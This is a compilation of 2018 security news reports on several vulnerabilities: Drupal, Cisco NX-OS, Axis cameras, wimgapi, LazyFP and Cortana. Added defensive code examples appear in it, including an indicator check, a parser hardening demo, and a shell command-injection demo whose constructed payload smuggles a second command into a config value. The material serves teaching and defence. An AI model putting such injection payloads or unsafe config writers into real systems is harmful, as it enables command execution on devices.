Network attacks exploiting a recently patched Drupal vulnerability are attempting to drop Monero mining malware onto vulnerable systems, Trend Micro reports.

Tracked as CVE-2018-7602 and considered a highly critical issue that could result in remote code execution, the vulnerability impacts Drupal’s versions 7 and 8 and was addressed in April this year.

The flaw is dubbed Drupalgeddon3 and the patch for it only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) has been applied.

Last month, hackers were observed targeting both security vulnerabilities to deliver a variety of threats, including cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Trend Micro now says they noticed network attacks exploiting CVE-2018-7602 to turn affected systems into Monero-mining bots. As part of the observed incidents, the exploit fetches a shell script that retrieves an Executable and Linkable Format-based (ELF) downloader.

The malware adds a crontab entry to automatically update itself and also retrieves and installs a Monero-mining application, a modified variant of the open-source XMRig (version 2.6.3). The use of XMRig is a feature common to most attacks attempting to mine for Monero.

The downloader also checks the target machine to determine whether it is worth compromising.

When executed, the mining application changes its process name to [^$I$^] and accesses the file /tmp/dvir.pid, Trend Micro says.

“This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics,” the security firm notes.
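The two indicators quoted above (and in the securityaffairs piece before it), a process renamed to [^$I$^] and the file /tmp/dvir.pid, are simple enough to turn into a host check for responders or a HIDS rule. The script below is an added example, not Trend Micro's code or anything from the articles; the process listing and PID-file contents are constructed samples, and for live use it assumes `ps -eo pid,comm` output on a Linux host.

```python
"""Check a Linux host for the process-name and PID-file indicators Trend
Micro reported for the CVE-2018-7602 (Drupalgeddon3) Monero-miner campaign.

Added example, not Trend Micro's code. The process listing and PID-file
contents below are constructed samples; live mode assumes `ps -eo pid,comm`.
"""
import os
import subprocess
from typing import Dict, Iterable, List, Optional

# Indicators as stated in the articles.
MINER_PROCESS_NAME = "[^$I$^]"
MINER_PID_FILE = "/tmp/dvir.pid"

# Constructed sample `ps -eo pid,comm` output with one renamed miner process.
SAMPLE_PS = """  PID COMMAND
    1 systemd
  842 sshd
 1337 php-fpm
 2048 [^$I$^]
 2101 bash
"""
# Constructed sample contents of /tmp/dvir.pid pointing at that process.
SAMPLE_PID_FILE = "2048\n"


def find_miner_processes(ps_lines: Iterable[str]) -> List[int]:
    """Return PIDs whose command name equals the miner's process name.

    Expects `ps -eo pid,comm` style lines ("<pid> <comm>"). The name is
    compared literally, so the brackets, carets and dollar signs in
    "[^$I$^]" need no regex escaping. Note that `comm` reflects the kernel
    task name (prctl PR_SET_NAME); checking `args` as well catches a
    miner that only rewrote argv[0].
    """
    pids: List[int] = []
    for line in ps_lines:
        parts = line.strip().split(None, 1)
        if len(parts) != 2 or not parts[0].isdigit():
            continue  # header line or malformed entry
        pid, comm = parts
        if comm.strip() == MINER_PROCESS_NAME:
            pids.append(int(pid))
    return pids


def read_pid_file(contents: Optional[str]) -> Optional[int]:
    """Parse the PID stored in a dvir.pid-style file; None if absent or garbage."""
    if contents is None:
        return None
    text = contents.strip()
    return int(text) if text.isdigit() else None


def assess_host(ps_lines: Iterable[str], pid_file_contents: Optional[str]) -> Dict[str, object]:
    """Combine both indicators; either one alone is enough to flag the host.

    pid_file_contents is None when /tmp/dvir.pid does not exist. A PID file
    whose value matches a live [^$I$^] process is the strongest signal; a
    stale file with no matching process still merits forensic follow-up.
    """
    miner_pids = find_miner_processes(ps_lines)
    pid_from_file = read_pid_file(pid_file_contents)
    return {
        "miner_pids": miner_pids,
        "pid_file_present": pid_file_contents is not None,
        "pid_file_matches_process": pid_from_file is not None and pid_from_file in miner_pids,
        "suspicious": bool(miner_pids) or pid_file_contents is not None,
    }


def assess_live_host() -> Dict[str, object]:
    """Run the check against the local system (Linux, procps `ps` assumed)."""
    ps = subprocess.run(["ps", "-eo", "pid,comm"], capture_output=True, text=True, check=False)
    contents: Optional[str] = None
    if os.path.exists(MINER_PID_FILE):
        with open(MINER_PID_FILE) as fh:
            contents = fh.read()
    return assess_host(ps.stdout.splitlines(), contents)


if __name__ == "__main__":
    print("sample:", assess_host(SAMPLE_PS.splitlines(), SAMPLE_PID_FILE))
    print("live:  ", assess_live_host())
```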

The actors behind this attack hide behind the Tor network, but Trend Micro says they were able to trace the activity to 197[.]231[.]221[.]211, an IP belonging to a virtual private network (VPN) provider. This IP address is a Tor exit node.

Over the past month, the security firm has blocked 810 attacks coming from this IP address, but cannot confirm that they were all related to the Monero-mining payload or performed by the same actor.

Most of the attacks attempt to exploit the Heartbleed vulnerability (CVE-2014-0160), while others target ShellShock (CVE-2014-6271), a flaw in WEB GoAhead (CVE-2017-5674), and an old memory leak in Apache (CVE-2004-0113).

“Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address. Note that these attacks exploit even old Linux or Unix-based vulnerabilities, underscoring the importance of defense in depth,” the security researchers warn.

Patched Drupal installations should be safe from the recent attacks and site admins are advised to apply the available patches as soon as possible, to ensure their systems remain secure.


Cisco Patches Critical Flaws in NX-OS Software
22.6.2018 securityweek
Vulnerebility

Cisco on Wednesday released patches for more than 30 security vulnerabilities in its products, including Critical flaws impacting NX-OS Software.

A total of five Critical arbitrary code execution vulnerabilities were addressed with this set of security patches, impacting the NX-API feature of NX-OS Software (CVE-2018-0301) and the Fabric Services component of FXOS Software and NX-OS Software (CVE-2018-0308, CVE-2018-0304, CVE-2018-0314, and CVE-2018-0312).

The bugs can be exploited by unauthenticated, remote attackers to cause a buffer overflow, execute arbitrary code (as root, in some cases), cause a denial of service (DoS) condition, or read sensitive memory content on an affected device.

The bugs impact multiple devices, including Nexus 3000 Series Switches to Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Firepower 4100 and Firepower 9300 products, UCS 6100 to UCS 6300 Series Fabric Interconnects, and MDS 9000 Series Multilayer Switches.

Cisco also addressed High risk vulnerabilities impacting NX-OS Software and FXOS Software, affecting Nexus 4000 Series Switch, Nexus 3000 and 9000 Series, and Firepower 4100 Series and Firepower 9300 Security Appliance.

The issues affecting NX-OS include command injections in the CLI and NX-API, denial of service (DoS) in the Simple Network Management Protocol (SNMP) input packet processor, elevation of privilege in role-based access control (RBAC), remote code execution and DoS in the Internet Group Management Protocol (IGMP) Snooping feature, DoS in the Border Gateway Protocol (BGP) implementation, and elevation of privilege in NX-API.

Flaws also affecting FXOS Software include an unauthorized administrator account in the write-erase feature, DoS conditions in the Discovery Protocol (formerly known as CDP) subsystem and the Cisco Fabric Services component, and arbitrary code execution in the Cisco Discovery Protocol component.

Issues affecting only FXOS Software include an arbitrary code execution vulnerability in the CLI parser and a denial of service bug in the web UI.

Additionally, Cisco patched DoS flaws in the SNMP feature of the Cisco Nexus 4000 Series Switch and in the implementation of a specific CLI command and the associated SNMP MIB for Cisco Nexus 3000 and 9000 Series Switches.

A path traversal vulnerability was resolved in the process of uploading new application images to the Cisco Firepower 4100 Series Next-Generation Firewall (NGFW) and Firepower 9300 Security Appliance.

As part of this set of security updates, Cisco also addressed 10 Medium risk flaws in TelePresence Video Communication Server (VCS) Expressway, Unified Communications Manager IM & Presence Service (formerly CUPS), NX-OS Software, NVIDIA TX1 BootROM, Meeting Server, Firepower Management Center, 5000 Series Enterprise Network Compute System and Unified Computing (UCS) E-Series Servers, and AnyConnect Secure Mobility Client for Windows Desktop.

Software updates were released for the vulnerable products. Cisco customers with valid licenses are advised to upgrade to an appropriate release. Details on the resolved vulnerabilities and the affected products and devices are available on Cisco’s website.


Cisco security updates address five critical issues in NX-OS Software
22.6.2018 securityaffairs
Vulnerebility

Cisco released security patches for more than 30 vulnerabilities, including five Critical arbitrary code execution issues affecting the NX-OS Software.
Cisco released security patches for more than 30 vulnerabilities including five Critical arbitrary code execution issues affecting the NX-API feature of NX-OS Software (CVE-2018-0301) and the Fabric Services component of FXOS Software and NX-OS Software (CVE-2018-0308, CVE-2018-0304, CVE-2018-0314, and CVE-2018-0312).

The vulnerabilities can be remotely exploited by unauthenticated attackers to trigger a buffer overflow and execute arbitrary code (as root, in some circumstances), cause a denial of service (DoS) condition, or read sensitive memory content on vulnerable devices.

According to Cisco, many devices are affected by the critical vulnerabilities, including Nexus 3000 Series Switches to Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, UCS 6100 to UCS 6300 Series Fabric Interconnects, Firepower 4100 and Firepower 9300 products, and MDS 9000 Series Multilayer Switches.

The security updates also address High-risk vulnerabilities in NX-OS Software and FXOS Software, affecting the Nexus 4000 Series Switch, Nexus 3000 and 9000 Series, and the Firepower 4100 Series and Firepower 9300 Security Appliance.

The vulnerabilities affecting NX-OS include:

command injections in the CLI and NX-API;
denial of service (DoS) in the Simple Network Management Protocol (SNMP) input packet processor;
elevation of privilege in role-based access control (RBAC);
remote code execution and DoS in the Internet Group Management Protocol (IGMP) Snooping feature;
DoS in the Border Gateway Protocol (BGP) implementation;
elevation of privilege in NX-API.

Security updates issued by Cisco also addressed DoS flaws in the SNMP feature of the Cisco Nexus 4000 Series Switch and in the implementation of a specific CLI command and the associated SNMP MIB for Cisco Nexus 3000 and 9000 Series Switches.

Further details on the vulnerabilities and the affected products are available on the Cisco Security Advisories and Alerts page.


Researchers Find 21,000 Exposed Container Orchestration Systems
21.6.2018 securityweek 
Vulnerebility

Researchers Discovered More Than 21,000 Container Orchestration and API Management Systems Exposed to the Public Internet

Public cloud and container technology is increasingly used by IT people because of the ease and speed of deployment, ephemeral workloads, and the ability to scale quickly and easily -- basically, the agility that public cloud and containers brings to DevOps. Popular container orchestration systems include Kubernetes, Docker Swarm, OpenShift and Mesosphere.

Container clusters are commonly managed, or orchestrated, from administrator dashboards that provide a single interface to manage all aspects of the containers. Kubernetes says it is comprised of a set of independent, composable control processes that continuously drive the current state towards the provided desired state. It says it eliminates the need for orchestration; but also says it orchestrates computing, networking, and storage infrastructure on behalf of user workloads.

The point, however, is that all the different container orchestrations provide a single administrative dashboard for administrator control. This dashboard can spin up new containers, delete unwanted containers, and access both the compute power and stored data on every container. Rarely, if ever, should this dashboard need to be visible to the internet.

"In early June 2018," states Lacework in a study (PDF) released Tuesday, "Lacework discovered more than 21,000 container orchestration and management systems on the internet, and these results highlight the potential for attack points caused by poorly configured resources, lack of credentials, and the use of non-secure protocols."

The issue here is that if a system is exposed to the internet when it need not be -- indeed should not be -- then it is likely that it is inadequately secured. If it has been configured to require multi-factor authentication, then access to the orchestration system will have some defense. But, "simple authentication simply won't be good enough," Lacework's chief security architect, Dan Hubbard, told SecurityWeek: "if you have 'admin' and 'abc123', anyone who can find the admin panel will be able to crack it."

The report notes that most of the management nodes it discovered are configured to require access credentials, but adds, "These organizations, and the others who will replicate their mistakes, are opening themselves up to brute force password and dictionary attacks."

It is generally considered that password security on its own is ineffective. But an insecure container orchestration system exposed on the internet is a bigger threat to a company's cloud-based container infrastructure than a backdoor into a traditional data center. The latter might provide access to a single server under the oversight of the security team and with additional security controls within the data center infrastructure. A container orchestration dashboard, however, provides immediate access to every container in the swarm.

"Consider what would happen," warns the report, "if [attackers] had all this but could operate their attack all from the Internet, hiding behind proxy servers, VPN concentrators, and compromised routers, essentially masking who they are and where they are coming from. Basically, your data, your customer’s data, and the foundation on which you’ve built your organization would be in major trouble."

Hubbard believes the basic problem that leaves orchestration dashboards visible to any potential attacker is a disconnect between the DevOps team and the security team. Faced by the need for development speed, DevOps uses containers for all the right reasons. But containers are outside of the traditional security perimeter; and the security team may not even be aware of their use.

"We need to build a bridge from DevOps to security if one doesn't already exist -- that's the missing piece here," said Hubbard. "It's about communicating and making sure that the security team has the tools to know when this is happening. It's a combination of communication, working together, and for the security team making sure they know when it is happening and/or can detect and handle it when it does happen."

Exposed container orchestration dashboards are potentially far more dangerous than the more frequently discussed misconfigured S3 buckets. S3 buckets are simple storage devices. Misconfiguration of S3 buckets gives unauthorized access to the stored content, but gives no access to any compute capability.

"The most common attack we are seeing now," explained Hubbard, "is that attackers are finding these open servers and they are going in there without the company being aware. The attackers are installing their own software and they're starting new machines and new containers in order to do bitcoin mining. They're doing this through these open panels they find on the internet. In this scenario the bad guys are getting access to your compute -- on all the machines -- and they can install their own code and run whatever they want; and they can access your data. So, it's a lot more powerful than just finding a mis-configured S3 bucket."

"Let’s be clear," says the Lacework report. "We are BIG BELIEVERS in all things public cloud, but we need to raise the bar, and raise it quick." The important thing here is to remove the orchestration panels from the internet.

"You should be able to connect securely through another way," advises Hubbard, "whether it's through a central server or through a direct connection through a VPN. Also, depending on the management technology... if it's K8s or whatever... they all have different defaults that they ship with and different ways you can configure authentication. Of course, MFA is the best."

The high-level message from this report is that if you are a developer deploying in the public cloud, then you have a responsibility to think about security; and if you are a security person, and you think that your company is or might be deploying in the public cloud, it's your responsibility to find out and then to deploy technologies and processes around that to make sure that you are secure. At the moment, there are too many examples of this not happening.


Hacking more than 400 Axis camera models by chaining 3 flaws
19.6.2018 securityaffairs
Vulnerebility

Researchers from cybersecurity firm VDOO have discovered several vulnerabilities affecting nearly 400 camera models from Axis Communications.
As part of a broader study of IoT devices, VDOO researchers found seven vulnerabilities in cameras manufactured by Axis Communications. According to the vendor, nearly 400 models are affected, and Axis has released security patches for each flaw.

An attacker who knows a camera's IP address can remotely take it over. By exploiting the flaws it is possible to access and freeze the video stream, control every function of the camera (e.g. motion detection, direction) and alter its software.

Experts warn that an attacker can compromise cameras to recruit them into a botnet that could be used to power a broad range of attacks, such as DDoS and cryptocurrency mining.

“One of the vendors for which we found vulnerable devices was Axis Communications. Our team discovered a critical chain of vulnerabilities in Axis security cameras. The vulnerabilities allow an adversary that obtained the camera’s IP address to remotely take over the cameras (via LAN or internet). In total, VDOO has responsibly disclosed seven vulnerabilities to Axis security team.” reads the analysis published by VDOO.

“Chaining three of the reported vulnerabilities together, allows an unauthenticated remote attacker that has access to the camera login page through the network (without any previous access to the camera or credentials to the camera) to fully control the affected camera.”

The experts published technical details for each issue along with proof-of-concept (PoC) code.

The researchers demonstrated that by chaining three of the vulnerabilities it is possible to hack Axis cameras: bypassing authentication (CVE-2018-10661), sending specially crafted dbus requests from a process running as root (CVE-2018-10662), and then injecting arbitrary shell commands (CVE-2018-10660).

Below is the attack sequence demonstrated by the researchers:

Step 1: The attacker uses an authorization bypass vulnerability (CVE-2018-10661) to send unauthenticated HTTP requests that reach the .srv functionality (that handles .srv requests) inside /bin/ssid. Normally, this functionality should only be accessible to administrative users.
Step 2: The attacker then utilizes an interface that allows sending any dbus message to the device’s bus, without restriction (CVE-2018-10662), that is reachable from /bin/ssid’s .srv. Due to the fact that /bin/ssid runs as root, these dbus messages are authorized to invoke most of the system’s dbus-services’ interfaces (that were otherwise subject to a strict authorization policy). The attacker chooses to send dbus messages to one such dbus-service’s interface – PolicyKitParhand, which offers functions for setting parhand parameters. The attacker now has control over any of the device’s parhand parameter values. (See the next vulnerability).
Step 3: A shell command injection vulnerability (CVE-2018-10660) is then exploited. Some parhand parameters (of type “Shell-Mounted”) end up in configuration files in shell variable assignment format, which are later included in a service’s init-script that runs as root. Due to step 2, the attacker is able to send unauthenticated requests to set parhand parameter values. By doing so, the attacker can exploit this vulnerability by setting one parameter’s value to a string with special characters that causes command injection, in order to execute commands as the root user.
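
The shell-variable-assignment pattern behind Step 3 reproduces in a few lines. The following Python script is an added example, not VDOO's PoC and not Axis code: it builds a configuration file the way a naive "shell-mounted" parameter writer would (KEY="value"), sources it from a stand-in init script under /bin/sh, and shows the injection succeeding; the hardened writer quotes the value with shlex.quote, and an allowlist check rejects it before it is ever stored. The parameter name NETWORK_HOSTNAME, the payload, the allowlist policy and the init script are constructed for the demonstration, and the script runs as the current user rather than as root.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Allowlist for parameter values that may ever reach a shell-sourced file.
# Hypothetical policy: letters, digits and a few punctuation characters.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9._:/@ -]*$")

# Stand-in for a root init script that includes the generated config file
# and then uses one of the parameters. Sourcing (".") means every byte of
# the file is parsed as shell syntax, which is exactly the problem.
INIT_SCRIPT = '. "$1"; printf "%s\\n" "$NETWORK_HOSTNAME"'


def is_safe_value(value: str) -> bool:
    """Reject values containing shell metacharacters before they are stored."""
    return SAFE_VALUE.match(value) is not None


def render_unsafe(params: dict) -> str:
    """Writes KEY="value" with the raw value interpolated: a double quote,
    semicolon or $(...) in the value becomes shell code on the next source."""
    return "".join(f'{key}="{value}"\n' for key, value in params.items())


def render_safe(params: dict) -> str:
    """Writes KEY='value' through shlex.quote, which single-quotes the value
    and escapes embedded single quotes, so it is always read back literally."""
    return "".join(f"{key}={shlex.quote(value)}\n" for key, value in params.items())


def run_init_script(config_text: str) -> str:
    """Write the config to a temp file, source it from INIT_SCRIPT under
    /bin/sh and return stdout. Anything the config injects shows up there."""
    fd, path = tempfile.mkstemp(suffix=".conf")
    try:
        with os.fdopen(fd, "w") as handle:
            handle.write(config_text)
        proc = subprocess.run(
            ["sh", "-c", INIT_SCRIPT, "sh", path],
            capture_output=True, text=True, check=False,
        )
        return proc.stdout
    finally:
        os.unlink(path)


if __name__ == "__main__":
    # Constructed payload: closes the double-quoted value, runs a command,
    # and comments out the trailing quote that the writer appends.
    payload = 'cam01"; echo INJECTED; #'
    params = {"NETWORK_HOSTNAME": payload}
    print("allowlist accepts payload:", is_safe_value(payload))
    print("unsafe config output:", run_init_script(render_unsafe(params)).splitlines())
    print("safe config output:  ", run_init_script(render_safe(params)).splitlines())
```

With the unsafe writer the sourced file runs `echo INJECTED` before the script ever reads the variable; with shlex.quote the same payload comes back as a literal string. On a device the right fix is both: never write unvalidated values into shell-parsed files, and do not let a root init script source files that an unprivileged interface can modify.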

The remaining vulnerabilities discovered by VDOO can be exploited by unauthenticated attackers to obtain information from memory or to trigger a DoS condition.


Axis published a security advisory that includes the complete list of all impacted cameras and the firmware version that addresses the vulnerabilities.

As part of the same study on the security of IoT devices, researchers at VDOO discovered several vulnerabilities in Foscam cameras.


Critical Flaws Expose 400 Axis Cameras to Remote Attacks
18.6.2018 securityweek  
Vulnerebility

Roughly 400 security cameras from Axis Communications are affected by several vulnerabilities, including critical flaws that can be chained to take complete control of a device and access its video stream.

As part of its research into IoT devices, cybersecurity firm VDOO has uncovered a total of seven vulnerabilities in cameras made by Axis. The vendor has identified nearly 400 affected models and released patches for each of them.

According to VDOO, an attacker who knows the targeted camera’s IP address can remotely and without authentication take full control of the device. This includes accessing its video stream, freezing the video stream, controlling the direction and functions of the camera (e.g. motion detection), adding the device to a botnet, altering its software, leveraging it for lateral movement within the network, abusing it for DDoS attacks and cryptocurrency mining, and rendering the camera useless.

There are three vulnerabilities that can be chained to remotely hack a device. These allow an attacker to bypass authentication (CVE-2018-10661), send specially crafted requests as root (CVE-2018-10662), and inject arbitrary shell commands (CVE-2018-10660).

The other flaws discovered by VDOO can be exploited by unauthenticated attackers to crash various processes or to obtain information from the memory.

Technical details and proof-of-concept (PoC) code have been made public for each of the vulnerabilities.

Axis has published an advisory containing the names of all impacted cameras and which firmware version contains patches.

This was not the first time researchers discovered vulnerabilities in cameras from Axis. Roughly one year ago, Senrio found a security hole, dubbed Devil’s Ivy, that allowed an attacker to cause a DoS condition or execute arbitrary code on Axis cameras. Since that flaw affected a third-party component, other IoT devices were affected as well.

As part of its research into IoT products, VDOO also discovered serious vulnerabilities in Foscam cameras. Foscam also released patches, unlike last year when researchers were forced to disclose multiple flaws after the vendor failed to take action.


Microsoft Patches Code Execution Vulnerability in wimgapi Library
16.6.2018 securityweek
Vulnerebility

Microsoft this week patched a remote code execution vulnerability affecting the wimgapi library, which is used to perform operations on Windows Imaging Format (WIM) files.

Addressed as part of Microsoft’s June 2018 Patch Tuesday, the issue was discovered by Talos’ Marcin Noga in the LoadIntegrityInfo function of wimgapi version 10.0.16299.15 (WinBuild.160101.0800). An attacker exploiting the flaw could use a specially crafted WIM image to cause heap corruption and achieve direct code execution.

Tracked as CVE-2018-8210, the vulnerability resides in the DLL used to perform operations on the file-based disk image format that Microsoft created to simplify the deployment of Windows systems. The bug manifests in the LoadIntegrityInfo function when a WIM file header is parsed and can be triggered “even on the simplest operations performed on malformed WIM file,” the researcher says.

“For example, it is enough if an application tries to open the WIM file via the WIMCreateFile function and requests a file handle. The function allocates heap memory based on a user-controlled size value, and uses another user-controlled value to read n bytes from the file into this buffer. It is using these values without any prior input checks,” Noga explains.
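
To make the pattern Noga describes concrete (a user-controlled allocation size, a second user-controlled byte count, no check between them), here is an added Python example. It is not Talos' PoC and not wimgapi code, and it uses a hypothetical, simplified header layout rather than the real WIM on-disk format: a magic, a u32 allocation size for the integrity table, a u32 count of bytes to read into it, and a u64 file offset. parse_integrity_naive mirrors the described logic; because a Python bytearray grows instead of corrupting the heap, the returned length exposes the overflow that C would silently write past the allocation. parse_integrity_checked adds the checks that belong in a loader, and the size cap is an assumed policy.

```python
import struct

# Hypothetical simplified header, NOT the real WIM on-disk layout:
#   0x00  8 bytes  magic
#   0x08  u32      alloc_size   bytes the loader allocates for the integrity table
#   0x0C  u32      read_count   bytes the loader copies into that buffer
#   0x10  u64      offset       where in the file those bytes live
HEADER = struct.Struct("<8sIIQ")
MAGIC = b"MSWIM\x00\x00\x00"
MAX_INTEGRITY_TABLE = 1 << 20  # sanity cap on the allocation (assumed policy)


class MalformedWim(ValueError):
    """Raised by the checked parser with the reason the file was rejected."""


def build_wim(alloc_size: int, read_count: int, offset: int, body: bytes = b"") -> bytes:
    """Constructs a test file: header followed by an arbitrary body."""
    return HEADER.pack(MAGIC, alloc_size, read_count, offset) + body


def parse_integrity_naive(data: bytes) -> bytearray:
    """The pattern described in the advisory: allocate alloc_size, then read
    read_count bytes from offset into that buffer with no cross-check.
    In C this overflows the heap when read_count > alloc_size; here the
    bytearray simply grows, so len(result) > alloc_size reveals the bug."""
    _magic, alloc_size, read_count, offset = HEADER.unpack_from(data, 0)
    buf = bytearray(alloc_size)
    buf[:read_count] = data[offset:offset + read_count]
    return buf


def parse_integrity_checked(data: bytes) -> bytes:
    """Validates every length and offset against the allocation and the
    file before touching memory. Comparisons are written so they cannot
    wrap around in a fixed-width integer language either."""
    if len(data) < HEADER.size:
        raise MalformedWim("truncated header")
    magic, alloc_size, read_count, offset = HEADER.unpack_from(data, 0)
    if magic != MAGIC:
        raise MalformedWim("bad magic")
    if alloc_size == 0 or alloc_size > MAX_INTEGRITY_TABLE:
        raise MalformedWim("integrity table size out of range")
    if read_count > alloc_size:
        raise MalformedWim("read length exceeds allocation")
    # "offset + read_count > len(data)" rewritten so it cannot overflow in C
    if offset < HEADER.size or offset > len(data) or read_count > len(data) - offset:
        raise MalformedWim("integrity table lies outside the file")
    return bytes(data[offset:offset + read_count])


def reject_reason(data: bytes):
    """Returns the rejection reason for data, or None if it parses cleanly."""
    try:
        parse_integrity_checked(data)
    except MalformedWim as err:
        return str(err)
    return None


if __name__ == "__main__":
    good = build_wim(16, 16, HEADER.size, b"A" * 16)
    evil = build_wim(16, 64, HEADER.size, b"B" * 64)
    print("good file:", reject_reason(good), "naive buffer", len(parse_integrity_naive(good)))
    print("evil file, naive buffer length:", len(parse_integrity_naive(evil)), "(allocated 16)")
    print("evil file, checked:", reject_reason(evil))
```

The checked parser fails closed on every field it reads, which is the property a fuzzer-found bug like this one tests for: no allocation before the size is bounded, no copy before the count is bounded by the allocation, and no file read before the offset and count are bounded by the file.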

An attacker exploiting the vulnerability could execute malicious code with the same access rights as the logged-in user. They could also crash the system with a denial-of-service attack, the researcher says. Because WIM files do not have a registered file type handler by default, the issue cannot be triggered if the user double-clicks a WIM file, unless a file-handler was registered first.

According to Talos, the vulnerability has a CVSSv3 score of 8.8. Microsoft, on the other hand, claims that the bug only has a CVSS score of 7.3 and that it is considered Important.

The remote code execution vulnerability “exists when Windows improperly handles objects in memory,” the software giant explains. The company also notes that an attacker able to successfully exploit the issue could control a vulnerable system.

Microsoft also adds that an attacker targeting the vulnerability “would first have to log on to the target system and then run a specially crafted application.”

To address the vulnerability, Microsoft released an update that corrects the manner in which Windows handles objects in memory. No mitigations or workarounds exist for this vulnerability, meaning that users need to install the recently released patch to keep systems safe.

Impacted products include Windows 10 (both 32-bit and 64-bit versions), Windows 8.1 (32-bit and 64-bit), Windows RT 8.1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server version 1709, and Windows Server version 1803.


A new Meltdown-like flaw tracked as LazyFP affects Intel CPUs
16.6.2018 securityaffairs
Vulnerebility

A new vulnerability involving side channel speculative execution on Intel chips, known as LazyFP, has been announced and assigned CVE-2018-3665.
The LazyFP vulnerability (CVE-2018-3665) involves side channel speculative execution on Intel CPUs; like the previous ones, it could be exploited by attackers to access sensitive information on the affected system.

The vulnerability was discovered by Julian Stecklina from Amazon Germany, Thomas Prescher from Cyberus Technology and Zdenek Sojka from SYSGO AG.

The vulnerability involves the handling of the floating point unit (FPU) state when the operating system switches between processes: the context switch must save the FPU register state of the outgoing process and restore that of the incoming one.

“System software may opt to utilize Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value,” reads the advisory published by Intel.

There are two types of switching, Lazy FPU and Eager FPU, the former has better performance on older systems.

Security researchers recently discovered that the Lazy method is vulnerable to attacks that could expose FPU state data, which can contain sensitive information such as cryptographic keys.

“The register state of the floating point unit (FPU), which consists of the AVX, MMX and SSE register sets, can be leaked across protection domain boundaries. This includes leaking across process- and virtual machine boundaries.” reads the analysis published by Thomas Prescher, Julian Stecklina and Jacek Galowicz.

“The FPU state may contain sensitive information such as cryptographic keys.”

According to the experts, the CVE-2018-3665 vulnerability is similar to Meltdown Variant 3a.

Intel confirms that the CVE-2018-3665 vulnerability affects its Core processors, but claims the issue has been addressed by operating system and hypervisor software developers for many years. Intel urges vendors that still haven’t fixed the issue to release the necessary security updates as soon as possible.

Systems using AMD or ARM processors do not appear to be affected by LazyFP.

Microsoft has yet to say exactly which versions of Windows are vulnerable, but the company noted that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. The tech giant assured customers that VMs running in Azure are not at risk.

“Is Lazy restore enabled by default and can it be disabled?

Lazy restore is enabled by default in Windows and cannot be disabled.” reads the FAQs published by Microsoft.

Recent versions of the Linux kernel use Eager FPU and are therefore not affected; on systems with older processors the flaw can be mitigated by enabling Eager FPU, booting the kernel with the “eagerfpu=on” option.

AWS told its customers that its infrastructure is not affected.


Meltdown-Like 'LazyFP' Vulnerability Impacts Intel CPUs
15.6.2018 securityweek
Vulnerebility

Intel and software vendors have started informing users about a new vulnerability involving side channel speculative execution that could be exploited by malicious actors to obtain sensitive information from the targeted system.

Dubbed LazyFP, the security hole is related to the floating point unit (FPU), also known as the math coprocessor. When the operating system switches between processes it saves the FPU register state of the current process and restores the state of the new process.

There are two types of switching, Lazy FPU and Eager FPU switching. Lazy FPU switching provides some benefits for performance, but on modern systems the gain has become negligible, which has led to an increasing use of Eager switching.

Researchers discovered recently that if the Lazy method is used, it may be possible for an attacker to access FPU state data, which can contain sensitive information, such as cryptographic keys.

“System software may opt to utilize Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value,” Intel said in an advisory.

The vulnerability, tracked as CVE-2018-3665, is similar to Meltdown, specifically Variant 3a, but the issue has been assigned only a “medium” severity rating.

Julian Stecklina from Amazon Germany, Thomas Prescher from Cyberus Technology and Zdenek Sojka from SYSGO AG have been credited for finding the vulnerability. Colin Percival has also been credited, but the researcher says he only wrote an exploit for the flaw.

Cyberus has published a blog post for the LazyFP vulnerability, but it has withheld some details at Intel’s request.

Each advisory, blog post and discussion focusing on LazyFP provides some clues as to which systems may be affected.

Intel says the vulnerability affects its Core processors, which are marketed as Xeon for servers. The company claims the issue has been addressed by operating system and hypervisor software developers for many years, and vendors that are still impacted should release updates in the coming weeks.

Systems using AMD or ARM processors do not appear to be impacted. “Based on our analysis to-date, we do not believe our products are susceptible to the recent security vulnerability identified around lazy FPU switching,” AMD told SecurityWeek.

Microsoft has yet to say exactly which versions of Windows are vulnerable, but the company noted that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. The tech giant assured customers that VMs running in Azure are not at risk.

AWS told customers that its infrastructure is not affected, but advised them to ensure their operating systems are always up to date. The Xen Project says systems running any version of Xen are vulnerable.

In the case of Linux, recent versions of the kernel use Eager FPU. On systems using older processors, the vulnerability can be mitigated by booting the kernel with the “eagerfpu=on” parameter to enable Eager FPU. Red Hat, DragonflyBSD and OpenBSD have published advisories.


Cortana Flaw Allows for Code Execution from Lock Screen
15.6.2018 securityweek
Vulnerebility

One of the vulnerabilities Microsoft addressed with the June 2018 security patches was a flaw in Cortana that could allow an attacker to elevate privileges and execute code from the lock screen.

The issue, discovered by Cedric Cochin, Cyber Security Architect and Senior Principal Engineer at McAfee, is tracked as CVE-2018-8140. The bug can be abused to execute code on the impacted machine, directly from the lock screen.

In an advisory, Microsoft explains that the vulnerability “exists when Cortana retrieves data from user input services without consideration for status.” The company confirms the possible exploitation to execute commands with elevated permissions.

The vulnerability requires physical access to the impacted device and appears connected to a flaw independent researchers Amichai Shulman and Tal Be'ery detailed in March, and which could be abused to install malware on the affected computers.

In order to exploit the issue, an attacker with access to the impacted computer needs to have Cortana assistance enabled. A user can interact with the voice-based assistant even from the lock screen, by saying “Hey Cortana.”

Cortana can also be tricked to display search results with the contextual search menu, from the lock screen. This, however, requires the use of a keyboard-timing sequence: “any keystroke can trigger the menu from the time when Cortana begins to listen to when the answer is displayed.”

According to Cochin, because Windows indexes file content, including strings in documents, Cortana can be abused to leak sensitive information. Specifically, if the right search phrase is used when clicking on the “tap and say” button, Cortana could show the content of confidential files, such as those storing passwords.

